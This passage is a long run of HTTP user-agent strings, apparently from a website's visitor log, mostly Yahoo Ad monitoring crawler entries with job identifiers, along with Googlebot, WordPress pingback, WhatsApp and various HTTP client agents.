tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1631923844-0 +Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; GoogleAdwordsExpress) Chrome/93.0.4577.83 Safari/537.36 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1631931480-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1631931506-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1631923845-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1631923841-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1631931481-0 +WordPress/5.8.1; https://freefoto.fotosda.buzz +ddg_android/5.95.0 (com.duckduckgo.mobile.android; Android API 30) +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1631960347-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1631992168-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1632011327-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1632020006-0 +Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; QQDownload 760; (R1 1.6); .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C) +WordPress/5.8.1; https://askphpquestions.com +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1632010600-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1632019175-10 +WordPress/5.8.1; https://www.maidsinaminute.com; verifying pingback from 45.56.81.68 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1632010601-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1632019176-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1632011030-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1632035110-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1632046908-10 +WhatsApp/2.21.19.15 A +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1632014743-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1632018799-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1632023058-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1632045497-0 +Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) adbeat.com/policy AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1632010567-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1632010602-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1632019174-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1632019176-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1632010603-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1632019177-0 +Python/3.6 aiohttp/3.2.0 +UCWEB/2.0 (Java; U; MIDP-2.0; Nokia203/20.37) U2/1.0.0 UCMini/11.0.0.1016 (SpeedMode; Proxy; Android 8.0.0; SM-N900 ) U2/1.0.0 Mobile +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1632010598-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1632019175-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1632097758-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1632105637-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-nonprod---sieve.hlfs-rest_client/1632130432-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-nonprod---sieve.hlfs-rest_client/1632137028-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-nonprod---sieve.hlfs-rest_client/1632144512-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-nonprod---sieve.hlfs-rest_client/1632152270-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1632096853-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1632105098-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-nonprod---sieve.hlfs-rest_client/1632129572-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-nonprod---sieve.hlfs-rest_client/1632136142-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-nonprod---sieve.hlfs-rest_client/1632143740-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-nonprod---sieve.hlfs-rest_client/1632151563-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1632096854-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1632105102-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-nonprod---sieve.hlfs-rest_client/1632136143-10 +WordPress/5.7.3; https://boxoreou.online +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1632116042-10 +Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36 MicroAdBot/1.1 (https://www.microad.co.jp/contact/) +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1632100802-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1632109175-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1632113911-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-nonprod---sieve.hlfs-rest_client/1632132474-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-nonprod---sieve.hlfs-rest_client/1632139579-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1632145035-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-nonprod---sieve.hlfs-rest_client/1632147201-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-nonprod---sieve.hlfs-rest_client/1632155921-0 +Java/1.8.0_302 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1632096854-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1632096850-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1632105097-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1632105104-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-nonprod---sieve.hlfs-rest_client/1632129570-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-nonprod---sieve.hlfs-rest_client/1632129573-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-nonprod---sieve.hlfs-rest_client/1632136170-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-nonprod---sieve.hlfs-rest_client/1632136144-0 +ArchiveTeam ArchiveBot/20210807.16be765 (wpull 2.0.3) and not Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.90 Safari/537.36 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-nonprod---sieve.hlfs-rest_client/1632143734-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-nonprod---sieve.hlfs-rest_client/1632143741-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-nonprod---sieve.hlfs-rest_client/1632151209-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-nonprod---sieve.hlfs-rest_client/1632151564-0 +UCWEB/2.0 (Java; U; MIDP-2.0; Nokia203/20.37) U2/1.0.0 UCMini/11.4.1.1138 (SpeedMode; Proxy; Android 6.0.1; AS-5433_Secret ) U2/1.0.0 Mobile +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1632096855-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1632105105-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-nonprod---sieve.hlfs-rest_client/1632129596-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-nonprod---sieve.hlfs-rest_client/1632143742-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-nonprod---sieve.hlfs-rest_client/1632151579-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1632096852-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1632105098-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-nonprod---sieve.hlfs-rest_client/1632129571-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-nonprod---sieve.hlfs-rest_client/1632136133-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-nonprod---sieve.hlfs-rest_client/1632143739-0 +WhatsApp/2.2136.10 N +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-nonprod---sieve.hlfs-rest_client/1632151244-0 +UCWEB/2.0 (Java; U; MIDP-2.0; Nokia203/20.37) U2/1.0.0 UCMini/11.1.0.1041 (SpeedMode; Proxy; Android 5.1.1; GT-S5360 ) U2/1.0.0 Mobile +Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.37 (compatible; Googlebot/2.1; http://www.google.com/bot.html) +WordPress/5.4.7; https://hardsk.com +Mozilla/5.0 (Linux; Android 6.0.1; Moto G (4)) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.54 Mobile Safari/537.36 PTST/210914.204639 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1632231304-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1632183124-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1632191977-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-nonprod---sieve.hlfs-rest_client/1632232459-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-nonprod---sieve.hlfs-rest_client/1632241328-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-nonprod---sieve.hlfs-rest_client/1632249587-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-nonprod---sieve.hlfs-rest_client/1632256065-10 +PHP/6.3.24 +PHP/6.3.11 +WordPress/4.7.5; http://www.itnetgroup.com +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1632191978-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-nonprod---sieve.hlfs-rest_client/1632232460-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-nonprod---sieve.hlfs-rest_client/1632241344-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-nonprod---sieve.hlfs-rest_client/1632249588-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1632184320-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1632189821-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1632193365-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1632242907-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1632186507-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1632196611-0 +Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Googlebot/2.1; +http://www.google.com/bot.html) Chrome/93.0.4577.82 Safari/537.36 +WordPress/5.5.5; https://peregiacc.co.uk +Mozilla/5.0 (compatible; Google-Apps-Script; beanserver; +https://script.google.com; id: UAEmdDd9PW__mwjtqUN_JrX1lRScbwSRoBw) +WordPress/5.8.1; http://intern.nnax.de +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-nonprod---sieve.hlfs-rest_client/1632237081-0 +WhatsApp/2.21.20.1 A +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1632243698-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-nonprod---sieve.hlfs-rest_client/1632245306-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-nonprod---sieve.hlfs-rest_client/1632245305-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-nonprod---sieve.hlfs-rest_client/1632252226-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-nonprod---sieve.hlfs-rest_client/1632260107-0 +Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36 Google-PageRenderer Google (+https://developers.google.com/+/web/snippet/) +WordPress/5.4.7; https://a.hootq.co +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1632183122-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1632183125-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1632191974-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1632191980-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-nonprod---sieve.hlfs-rest_client/1632232458-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-nonprod---sieve.hlfs-rest_client/1632232461-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-nonprod---sieve.hlfs-rest_client/1632241327-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-nonprod---sieve.hlfs-rest_client/1632241345-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-nonprod---sieve.hlfs-rest_client/1632249578-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-nonprod---sieve.hlfs-rest_client/1632249589-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-nonprod---sieve.hlfs-rest_client/1632256063-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-nonprod---sieve.hlfs-rest_client/1632256066-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1632183126-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1632191981-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-nonprod---sieve.hlfs-rest_client/1632241346-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-nonprod---sieve.hlfs-rest_client/1632256067-0 +Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html),gzip(gfe) +WordPress/5.8.1; https://andicrafts.me +Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp) sieve-gq1/1632217564-60 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1632183123-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1632191976-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-nonprod---sieve.hlfs-rest_client/1632232459-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-nonprod---sieve.hlfs-rest_client/1632241328-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-nonprod---sieve.hlfs-rest_client/1632249587-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-nonprod---sieve.hlfs-rest_client/1632256064-0 +WordPress/5.8.1; https://www.nach-welt.com +WordPress/5.8.1; https://www.nouvelles-du-monde.com +WordPress/5.8.1; https://notiulti.com +okhttp/4.0.0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1632271313-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1632281567-0 +WordPress/5.8.1; https://tech.springcard.com +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1632328286-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1632328349-0 +My Nutch Spider/Nutch-1.15 +PHP/6.2.74 +PHP/5.2.41 +WordPress/5.7; http://litocon.grupoconstrufran.com.br; verifying pingback from 190.123.212.17 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1632272329-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) 